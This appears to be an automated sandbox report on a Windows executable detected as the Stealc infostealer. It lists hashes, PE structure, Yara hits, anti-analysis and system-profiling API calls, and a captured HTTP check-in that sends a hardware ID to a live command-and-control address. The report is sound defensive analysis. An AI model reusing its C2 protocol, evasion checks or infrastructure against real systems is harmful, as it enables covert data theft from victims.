                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:8
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 80%
                                      • Number of executed functions: 19
                                      • Number of non-executed functions: 130
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                      No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.215.113.206 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
| file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
| file.exe | Get hash | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm | Browse | 185.215.113.206/6c4adf523b719729.php
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                                      No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
| file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
| file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc | Browse | 185.215.113.16
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
| file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
| file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
| file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
                                      No context
                                      No context
                                      No created / dropped files found
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.9602168961504365
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:file.exe
                                      File size:2'185'728 bytes
                                      MD5:6fb5f961b07cc3d84be8823133c05c50
                                      SHA1:482608c2008a693ff1bad6ca205dec70ef67e370
                                      SHA256:b42bb6681e8e078f5c11a99ad67040722bc93a9eebb2f4f5604f6c571112b488
                                      SHA512:c34d8fa310ef446890e2dcbe1eecece02ea1237ef37e37a58c6f089163fdb5a9cea7742432020a081f9cace35172b8609487e6518a0d2a31b9afb69757cccb49
                                      SSDEEP:49152:RzzJV3/ybsxM7qwOyeS/4bCum30nrNmJ4TH+XB:RzzD3/ybBtOyFd30rND
                                      TLSH:FEA53366CF99C30EE3365472E94AD6C49A9D83F7CD48EDE5A830107E31EF19426CB252
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                                      Icon Hash:00928e8e8686b000
                                      Entrypoint:0xb4b000
                                      Entrypoint Section:.taggant
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                                      Instruction
                                      jmp 00007F8ED0ADEABAh
                                      Programming Language:
                                      • [C++] VS2010 build 30319
                                      • [ASM] VS2010 build 30319
                                      • [ C ] VS2010 build 30319
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x2e7000 | 0x67600 | 5c109db2584be3871a71eb8c1c424cce | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x2ea000 | 0x2b5000 | 0x200 | 39f76d026fea79a3b0ef1d69b6a634aa | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gaborkim | 0x59f000 | 0x1ab000 | 0x1aaa00 | 854efea7f921044ae88682460cb0e5a7 | False | 0.994803874890126 | data | 7.953963790635809 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pqqqwztq | 0x74a000 | 0x1000 | 0x400 | 7059815595630f89a799de4c931b3f69 | False | 0.7431640625 | data | 5.963722945724209 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x74b000 | 0x3000 | 0x2200 | a7c959b4d06b94c31f80368efda46469 | False | 0.06204044117647059 | DOS executable (COM) | 0.652634244808355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-28T07:18:28.265872+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.7 | 49704 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 28, 2024 07:18:27.061790943 CET | 49704 | 80 | 192.168.2.7 | 185.215.113.206
Oct 28, 2024 07:18:27.067307949 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.7
Oct 28, 2024 07:18:27.067388058 CET | 49704 | 80 | 192.168.2.7 | 185.215.113.206
Oct 28, 2024 07:18:27.068211079 CET | 49704 | 80 | 192.168.2.7 | 185.215.113.206
Oct 28, 2024 07:18:27.073610067 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.7
Oct 28, 2024 07:18:27.976746082 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.7
Oct 28, 2024 07:18:27.976833105 CET | 49704 | 80 | 192.168.2.7 | 185.215.113.206
Oct 28, 2024 07:18:27.979439020 CET | 49704 | 80 | 192.168.2.7 | 185.215.113.206
Oct 28, 2024 07:18:27.984847069 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.7
Oct 28, 2024 07:18:28.265805960 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.7
Oct 28, 2024 07:18:28.265872002 CET | 49704 | 80 | 192.168.2.7 | 185.215.113.206
Oct 28, 2024 07:18:30.343728065 CET | 49704 | 80 | 192.168.2.7 | 185.215.113.206
                                      • 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49704 | 185.215.113.206 | 80 | 7328 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 07:18:27.068211079 CET | 90 | OUT | GET / HTTP/1.1
                                      Host: 185.215.113.206
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
Oct 28, 2024 07:18:27.976746082 CET | 203 | IN | HTTP/1.1 200 OK
                                      Date: Mon, 28 Oct 2024 06:18:27 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Content-Length: 0
                                      Keep-Alive: timeout=5, max=100
                                      Connection: Keep-Alive
                                      Content-Type: text/html; charset=UTF-8
Oct 28, 2024 07:18:27.979439020 CET | 413 | OUT | POST /6c4adf523b719729.php HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFH
                                      Host: 185.215.113.206
                                      Content-Length: 211
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Data Raw: 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 41 37 35 33 33 34 33 39 45 42 33 32 39 34 35 36 34 35 34 37 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 2d 2d 0d 0a
                                      Data Ascii: ------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="hwid"A8A7533439EB3294564547------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="build"tale------DBFIEHDHIIIECAAKECFH--
Oct 28, 2024 07:18:28.265805960 CET | 210 | IN | HTTP/1.1 200 OK
                                      Date: Mon, 28 Oct 2024 06:18:28 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Content-Length: 8
                                      Keep-Alive: timeout=5, max=99
                                      Connection: Keep-Alive
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                      Data Ascii: YmxvY2s=
                                      Target ID:0
                                      Start time:02:18:23
                                      Start date:28/10/2024
                                      Path:C:\Users\user\Desktop\file.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                      Imagebase:0xe10000
                                      File size:2'185'728 bytes
                                      MD5 hash:6FB5F961B07CC3D84BE8823133C05C50
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1350066957.0000000005670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true
                                        Execution Graph

                                        Execution Coverage:3.1%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:3.5%
                                        Total number of Nodes:1327
                                        Total number of Limit Nodes:24
                                        execution_graph 37362 e26c90 37407 e122a0 37362->37407 37386 e26d04 37387 e2acc0 4 API calls 37386->37387 37388 e26d0b 37387->37388 37389 e2acc0 4 API calls 37388->37389 37390 e26d12 37389->37390 37391 e2acc0 4 API calls 37390->37391 37392 e26d19 37391->37392 37393 e2acc0 4 API calls 37392->37393 37394 e26d20 37393->37394 37559 e2abb0 37394->37559 37396 e26dac 37563 e26bc0 GetSystemTime 37396->37563 37397 e26d29 37397->37396 37399 e26d62 OpenEventA 37397->37399 37401 e26d95 CloseHandle Sleep 37399->37401 37402 e26d79 37399->37402 37404 e26daa 37401->37404 37406 e26d81 CreateEventA 37402->37406 37404->37397 37405 e26db6 CloseHandle ExitProcess 37406->37396 37760 e14610 37407->37760 37409 e122b4 37410 e14610 2 API calls 37409->37410 37411 e122cd 37410->37411 37412 e14610 2 API calls 37411->37412 37413 e122e6 37412->37413 37414 e14610 2 API calls 37413->37414 37415 e122ff 37414->37415 37416 e14610 2 API calls 37415->37416 37417 e12318 37416->37417 37418 e14610 2 API calls 37417->37418 37419 e12331 37418->37419 37420 e14610 2 API calls 37419->37420 37421 e1234a 37420->37421 37422 e14610 2 API calls 37421->37422 37423 e12363 37422->37423 37424 e14610 2 API calls 37423->37424 37425 e1237c 37424->37425 37426 e14610 2 API calls 37425->37426 37427 e12395 37426->37427 37428 e14610 2 API calls 37427->37428 37429 e123ae 37428->37429 37430 e14610 2 API calls 37429->37430 37431 e123c7 37430->37431 37432 e14610 2 API calls 37431->37432 37433 e123e0 37432->37433 37434 e14610 2 API calls 37433->37434 37435 e123f9 37434->37435 37436 e14610 2 API calls 37435->37436 37437 e12412 37436->37437 37438 e14610 2 API calls 37437->37438 37439 e1242b 37438->37439 37440 e14610 2 API calls 37439->37440 37441 e12444 37440->37441 37442 e14610 2 API calls 37441->37442 37443 e1245d 37442->37443 37444 e14610 2 API calls 37443->37444 37445 e12476 37444->37445 37446 e14610 2 API calls 37445->37446 37447 e1248f 37446->37447 37448 e14610 2 API calls 37447->37448 
[Execution graph residue: the interactive call-graph viewer's node/edge data, rendered as text. Nodes are function start addresses in the sample (0xe110a0 through 0xe2ade0 in this section) labelled with the Windows API calls made from each function; edges ("a->b") are caller-to-callee relations. Only the recoverable content is kept below.]
API sequences visible in the graph data:
- e29aa0/e29bb0: GetPEB, then repeated LoadLibraryA and GetProcAddress; e29f20 and following nodes resolve further imports through GetProcAddress (runtime import resolution).
- e111d0 chain: GetSystemInfo, GetCurrentProcess + VirtualAllocExNuma, VirtualAlloc/VirtualFree, GlobalMemoryStatusEx, __aulldiv; each check has an ExitProcess branch.
- e26a10: GetUserDefaultLangID followed by five ExitProcess branches (locale check).
- e279e0 and e27a70: GetProcessHeap, RtlAllocateHeap, then GetUserNameA / GetComputerNameA; e27690: GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap, wsprintfA.
- e26c38: sscanf, SystemTimeToFileTime (twice), with an ExitProcess branch at e26c78.
- e148d0 chain: InternetCrackUrlA (e14898), GetSystemTime (e28d12), InternetOpenA + StrCmpCA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, InternetCloseHandle; e1a210: CryptStringToBinaryA, LocalAlloc, CryptStringToBinaryA, LocalFree.
- e219f0: a series of StrCmpCA comparisons (e21a14 through e21bc0) with an ExitProcess branch at e21a1f; e25760: StrCmpCA comparisons with a Sleep branch at e25c66.
- e14610: RtlAllocateHeap, VirtualProtect; e2aa50, e2aab0, e2abb0, e2ac30, e2acc0: lstrcpy/lstrcat/lstrlen string helpers called throughout.
38785->38783 38786->38764 38787->38704

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 660 e29bb0-e29bc4 call e29aa0 663 e29de3-e29e42 LoadLibraryA * 5 660->663 664 e29bca-e29dde call e29ad0 GetProcAddress * 21 660->664 666 e29e44-e29e58 GetProcAddress 663->666 667 e29e5d-e29e64 663->667 664->663 666->667 669 e29e96-e29e9d 667->669 670 e29e66-e29e91 GetProcAddress * 2 667->670 671 e29eb8-e29ebf 669->671 672 e29e9f-e29eb3 GetProcAddress 669->672 670->669 673 e29ec1-e29ed4 GetProcAddress 671->673 674 e29ed9-e29ee0 671->674 672->671 673->674 675 e29ee2-e29f0c GetProcAddress * 2 674->675 676 e29f11-e29f12 674->676 675->676
                                        APIs
                                        • GetProcAddress.KERNEL32(77190000,01A814B0), ref: 00E29BF1
                                        • GetProcAddress.KERNEL32(77190000,01A81750), ref: 00E29C0A
                                        • GetProcAddress.KERNEL32(77190000,01A81468), ref: 00E29C22
                                        • GetProcAddress.KERNEL32(77190000,01A81588), ref: 00E29C3A
                                        • GetProcAddress.KERNEL32(77190000,01A81498), ref: 00E29C53
                                        • GetProcAddress.KERNEL32(77190000,01A88958), ref: 00E29C6B
                                        • GetProcAddress.KERNEL32(77190000,01A767B8), ref: 00E29C83
                                        • GetProcAddress.KERNEL32(77190000,01A765F8), ref: 00E29C9C
                                        • GetProcAddress.KERNEL32(77190000,01A814E0), ref: 00E29CB4
                                        • GetProcAddress.KERNEL32(77190000,01A815E8), ref: 00E29CCC
                                        • GetProcAddress.KERNEL32(77190000,01A814F8), ref: 00E29CE5
                                        • GetProcAddress.KERNEL32(77190000,01A81510), ref: 00E29CFD
                                        • GetProcAddress.KERNEL32(77190000,01A766F8), ref: 00E29D15
                                        • GetProcAddress.KERNEL32(77190000,01A81540), ref: 00E29D2E
                                        • GetProcAddress.KERNEL32(77190000,01A81600), ref: 00E29D46
                                        • GetProcAddress.KERNEL32(77190000,01A76418), ref: 00E29D5E
                                        • GetProcAddress.KERNEL32(77190000,01A81660), ref: 00E29D77
                                        • GetProcAddress.KERNEL32(77190000,01A81558), ref: 00E29D8F
                                        • GetProcAddress.KERNEL32(77190000,01A76638), ref: 00E29DA7
                                        • GetProcAddress.KERNEL32(77190000,01A817F8), ref: 00E29DC0
                                        • GetProcAddress.KERNEL32(77190000,01A76438), ref: 00E29DD8
                                        • LoadLibraryA.KERNEL32(01A817E0,?,00E26CA0), ref: 00E29DEA
                                        • LoadLibraryA.KERNEL32(01A81780,?,00E26CA0), ref: 00E29DFB
                                        • LoadLibraryA.KERNEL32(01A81798,?,00E26CA0), ref: 00E29E0D
                                        • LoadLibraryA.KERNEL32(01A817B0,?,00E26CA0), ref: 00E29E1F
                                        • LoadLibraryA.KERNEL32(01A817C8,?,00E26CA0), ref: 00E29E30
                                        • GetProcAddress.KERNEL32(76850000,01A81810), ref: 00E29E52
                                        • GetProcAddress.KERNEL32(77040000,01A81828), ref: 00E29E73
                                        • GetProcAddress.KERNEL32(77040000,01A81768), ref: 00E29E8B
                                        • GetProcAddress.KERNEL32(75A10000,01A88E70), ref: 00E29EAD
                                        • GetProcAddress.KERNEL32(75690000,01A76598), ref: 00E29ECE
                                        • GetProcAddress.KERNEL32(776F0000,01A88848), ref: 00E29EEF
                                        • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00E29F06
                                        Strings
                                        • NtQueryInformationProcess, xrefs: 00E29EFA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: NtQueryInformationProcess
                                        • API String ID: 2238633743-2781105232
                                        • Opcode ID: f5137ce5bbbfe70aa5c686c35e724ede179a8eeef28a6be828c521fb50bf7a95
                                        • Instruction ID: 61e620cbd6bcf42d5ea61e727802703155ace0e621d587ac5f553a1c3ef92665
                                        • Opcode Fuzzy Hash: f5137ce5bbbfe70aa5c686c35e724ede179a8eeef28a6be828c521fb50bf7a95
                                        • Instruction Fuzzy Hash: 2BA11FB5500200DFC364DFAAF8889567BEAE759F01B10865EF9898B258D73FA541CFA0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 764 e14610-e146e5 RtlAllocateHeap 781 e146f0-e146f6 764->781 782 e146fc-e1479a 781->782 783 e1479f-e147f9 VirtualProtect 781->783 782->781
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E1465F
                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00E147EC
                                        Strings
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (one string, referenced 30 times in this routine), xrefs: 00E14617, 00E14622, 00E1462D, 00E14638, 00E14643, 00E14667, 00E14672, 00E1467D, 00E14688, 00E14693, 00E146A7, 00E146B2, 00E146BD, 00E146C8, 00E146D3, 00E146FC, 00E14707, 00E14712, 00E1471D, 00E14728, 00E14763, 00E1476E, 00E14779, 00E14784, 00E1478F, 00E1479F, 00E147AA, 00E147B5, 00E147C0, 00E147CB
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeapProtectVirtual
                                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same sentence repeated once per xref above, '$'-separated)
                                        • API String ID: 1542196881-2218711628
                                        • Opcode ID: d0ac60c43f9efb25e51dd86f7576f02d3bb0ac498c2ca2f16ba5c7137cc49503
                                        • Instruction ID: 84fab0ea86c7ae38e49a86d5d12ed0fe4f76a961a8563b8336984f29613675c8
                                        • Opcode Fuzzy Hash: d0ac60c43f9efb25e51dd86f7576f02d3bb0ac498c2ca2f16ba5c7137cc49503
                                        • Instruction Fuzzy Hash: 8241C0717DA708EE8B78B7A88C7EBDD7A565F42706F907045AC21B73C0CB705A008597

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1033 e162d0-e1635b call e2aab0 call e14800 call e2aa50 InternetOpenA StrCmpCA 1040 e16364-e16368 1033->1040 1041 e1635d 1033->1041 1042 e16559-e16575 call e2aab0 call e2ab10 * 2 1040->1042 1043 e1636e-e16392 InternetConnectA 1040->1043 1041->1040 1062 e16578-e1657d 1042->1062 1045 e16398-e1639c 1043->1045 1046 e1654f-e16553 InternetCloseHandle 1043->1046 1048 e163aa 1045->1048 1049 e1639e-e163a8 1045->1049 1046->1042 1051 e163b4-e163e2 HttpOpenRequestA 1048->1051 1049->1051 1053 e16545-e16549 InternetCloseHandle 1051->1053 1054 e163e8-e163ec 1051->1054 1053->1046 1056 e16415-e16455 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 e163ee-e1640f InternetSetOptionA 1054->1057 1059 e16457-e16477 call e2aa50 call e2ab10 * 2 1056->1059 1060 e1647c-e1649b call e28ad0 1056->1060 1057->1056 1059->1062 1067 e16519-e16539 call e2aa50 call e2ab10 * 2 1060->1067 1068 e1649d-e164a4 1060->1068 1067->1062 1071 e16517-e1653f InternetCloseHandle 1068->1071 1072 e164a6-e164d0 InternetReadFile 1068->1072 1071->1053 1076 e164d2-e164d9 1072->1076 1077 e164db 1072->1077 1076->1077 1080 e164dd-e16515 call e2acc0 call e2abb0 call e2ab10 1076->1080 1077->1071 1080->1072
                                        APIs
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                          • Part of subcall function 00E14800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14889
                                          • Part of subcall function 00E14800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14899
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        • InternetOpenA.WININET(00E30DFF,00000001,00000000,00000000,00000000), ref: 00E16331
                                        • StrCmpCA.SHLWAPI(?,01A8F1A8), ref: 00E16353
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E16385
                                        • HttpOpenRequestA.WININET(00000000,GET,?,01A8EB30,00000000,00000000,00400100,00000000), ref: 00E163D5
                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E1640F
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E16421
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00E1644D
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E164BD
                                        • InternetCloseHandle.WININET(00000000), ref: 00E1653F
                                        • InternetCloseHandle.WININET(00000000), ref: 00E16549
                                        • InternetCloseHandle.WININET(00000000), ref: 00E16553
